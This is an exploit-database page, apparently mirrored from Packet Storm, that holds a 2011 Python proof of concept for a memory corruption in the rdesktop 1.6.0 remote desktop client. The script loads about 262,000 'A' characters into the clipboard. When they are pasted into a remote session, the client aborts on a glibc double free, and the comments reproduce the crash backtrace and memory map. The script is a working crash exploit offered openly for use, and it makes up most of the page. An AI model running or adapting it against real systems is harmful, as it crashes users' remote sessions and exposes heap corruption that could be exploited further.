Lucene search
K

rdesktop 1.6.0 Memory Corruption

🗓️ 09 Feb 2011 00:00:00Reported by badc0reType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 19 Views

rdesktop 1.6.0 Memory Corruption (Copy from clipboard) PoC by Dame Jovanosk

Code
`#rdestkop 1.6.0 Memory Corruption (Copy from clipboard) PoC  
#By Dame Jovanoski (badc0re)  
#  
# This is the result of 262120 inserted into clipboard and coppied on remote machine  
# using rdesktop 1.6.0 tested od Ubuntu 9.10.  
#  
# Use of this exploit: python rdeskop.py.  
#   
# And next is shift-insert(or ctrl-v) for copy.  
#   
# This is what you get:  
#  
#root@bt:~# rdesktop 192.168.204.133  
#WARNING: Remote desktop does not support colour depth 24; falling back to 16  
#*** glibc detected *** rdesktop: double free or corruption (fasttop): 0x083f3250 ***  
#======= Backtrace: =========  
#/lib/tls/i686/cmov/libc.so.6[0xb7a4d454]  
##/lib/tls/i686/cmov/libc.so.6(cfree+0x96)[0xb7a4f4b6]  
#/usr/lib/libX11.so.6(XFree+0x1d)[0xb7b74fdd]  
#rdesktop[0x805f43f]  
#rdesktop[0x805a2b6]  
##rdesktop[0x80630ff]  
#rdesktop[0x80636d8]  
#rdesktop[0x8063848]  
#rdesktop[0x8064013]  
#rdesktop[0x806484b]  
#rdesktop[0x80663e3]  
#rdesktop[0x80672b9]  
#rdesktop[0x8067dbc]  
#rdesktop[0x804ec2a]  
#/lib/tls/i686/cmov/libc.so.6(__libc_start_main+0xe5)[0xb79f4685]  
#rdesktop[0x804ca61]  
#======= Memory map: ========  
#08048000-0807c000 r-xp 00000000 03:01 114747 /usr/bin/rdesktop  
#0807c000-0807d000 r--p 00034000 03:01 114747 /usr/bin/rdesktop  
#0807d000-0807f000 rw-p 00035000 03:01 114747 /usr/bin/rdesktop  
#0807f000-08418000 rw-p 00000000 00:00 0 [heap]  
#b7500000-b7521000 rw-p 00000000 00:00 0  
#b7521000-b7600000 ---p 00000000 00:00 0  
#b769b000-b771c000 rw-p 00000000 00:00 0  
#b791d000-b7925000 r-xp 00000000 03:01 120953 /usr/lib/libXrender.so.1.3.0  
#b7925000-b7926000 r--p 00007000 03:01 120953 /usr/lib/libXrender.so.1.3.0  
#b7926000-b7927000 rw-p 00008000 03:01 120953 /usr/lib/libXrender.so.1.3.0  
#b7927000-b792f000 r-xp 00000000 03:01 120903 /usr/lib/libXcursor.so.1.0.2  
#b792f000-b7930000 rw-p 00007000 03:01 120903 /usr/lib/libXcursor.so.1.0.2  
#b7933000-b7940000 r-xp 00000000 03:01 105519 /lib/libgcc_s.so.1  
#b7940000-b7941000 r--p 0000c000 03:01 105519 /lib/libgcc_s.so.1  
#b7941000-b7942000 rw-p 0000d000 03:01 105519 /lib/libgcc_s.so.1  
#b7942000-b794c000 r-xp 00000000 03:01 122321 /lib/tls/i686/cmov/libnss_files-2.8.90.so  
#b794c000-b794d000 r--p 00009000 03:01 122321 /lib/tls/i686/cmov/libnss_files-2.8.90.so  
#b794d000-b794e000 rw-p 0000a000 03:01 122321 /lib/tls/i686/cmov/libnss_files-2.8.90.so  
#b794e000-b7957000 r-xp 00000000 03:01 122325 /lib/tls/i686/cmov/libnss_nis-2.8.90.so  
#b7957000-b7958000 r--p 00008000 03:01 122325 /lib/tls/i686/cmov/libnss_nis-2.8.90.so  
#b7958000-b7959000 rw-p 00009000 03:01 122325 /lib/tls/i686/cmov/libnss_nis-2.8.90.so  
#b7959000-b796e000 r-xp 00000000 03:01 122315 /lib/tls/i686/cmov/libnsl-2.8.90.so  
#b796e000-b796f000 r--p 00014000 03:01 122315 /lib/tls/i686/cmov/libnsl-2.8.90.so  
#b796f000-b7970000 rw-p 00015000 03:01 122315 /lib/tls/i686/cmov/libnsl-2.8.90.so  
#b7970000-b7972000 rw-p 00000000 00:00 0  
#b7972000-b7979000 r-xp 00000000 03:01 122317 /lib/tls/i686/cmov/libnss_compat-2.8.90.so  
#b7979000-b797a000 r--p 00006000 03:01 122317 /lib/tls/i686/cmov/libnss_compat-2.8.90.so  
#b797a000-b797b000 rw-p 00007000 03:01 122317 /lib/tls/i686/cmov/libnss_compat-2.8.90.so  
#b797b000-b797c000 rw-p 00000000 00:00 0  
#b797c000-b7980000 r-xp 00000000 03:01 120909 /usr/lib/libXdmcp.so.6.0.0  
#b7980000-b7981000 rw-p 00003000 03:01 120909 /usr/lib/libXdmcp.so.6.0.0  
#b7981000-b7982000 rw-p 00000000 00:00 0  
#b7982000-b7984000 r-xp 00000000 03:01 120891 /usr/lib/libXau.so.6.0.0  
#b7984000-b7985000 rw-p 00001000 03:01 120891 /usr/lib/libXau.so.6.0.0  
#b7985000-b799c000 r-xp 00000000 03:01 215752 /usr/lib/libxcb.so.1.0.0  
#b799c000-b799d000 r--p 00016000 03:01 215752 /usr/lib/libxcb.so.1.0.0  
#b799d000-b799e000 rw-p 00017000 03:01 215752 /usr/lib/libxcb.so.1.0.0  
#b799e000-b799f000 r-xp 00000000 03:01 215748 /usr/lib/libxcb-xlib.so.0.0.0  
#b799f000-b79a0000 r--p 00000000 03:01 215748 /usr/lib/libxcb-xlib.so.0.0.0  
#b79a0000-b79a1000 rw-p 00001000 03:01 215748 /usr/lib/libxcb-xlib.so.0.0.0  
#b79a1000-b79a8000 r-xp 00000000 03:01 122334 /lib/tls/i686/cmov/librt-2.8.90.so  
#b79a8000-b79a9000 r--p 00007000 03:01 122334 /lib/tls/i686/cmov/librt-2.8.90.so  
#b79a9000-b79aa000 rw-p 00008000 03:01 122334 /lib/tls/i686/cmov/librt-2.8.90.so  
#b79aa000-b79bf000 r-xp 00000000 03:01 122330 /lib/tls/i686/cmov/libpthread-2.8.90.so  
#b79bf000-b79c0000 r--p 00014000 03:01 122330 /lib/tls/i686/cmov/libpthread-2.8.90.so  
#b79c0000-b79c1000 rw-p 00015000 03:01 122330 /lib/tls/i686/cmov/libpthread-2.8.90.so  
#b79c1000-b79c4000 rw-p 00000000 00:00 0  
#b79c4000-b79d8000 r-xp 00000000 03:01 215832 /usr/lib/libz.so.1.2.3.3  
#b79d8000-b79da000 rw-p 00013000 03:01 215832 /usr/lib/libz.so.1.2.3.3  
#b79da000-b79dc000 r-xp 00000000 03:01 122310 /lib/tls/i686/cmov/libdl-2.8.90.so  
#b79dc000-b79dd000 r--p 00001000 03:01 122310 /lib/tls/i686/cmov/libdl-2.8.90.Aborted  
  
from struct import *  
import time  
import pygtk  
pygtk.require('2.0')  
import gtk   
import sys  
  
print "Creating expoit."  
time.sleep(1)  
print "Creating explot.."  
time.sleep(1)  
print "Creating explot..."  
buf="\x41"*262120  
try:  
clipboard = gtk.clipboard_get()  
text=clipboard.wait_for_text()  
clipboard.set_text(buf)  
clipboard.store()  
print "String is copied into clipboard."  
except:  
print "String cannot be copied into clipboard."  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation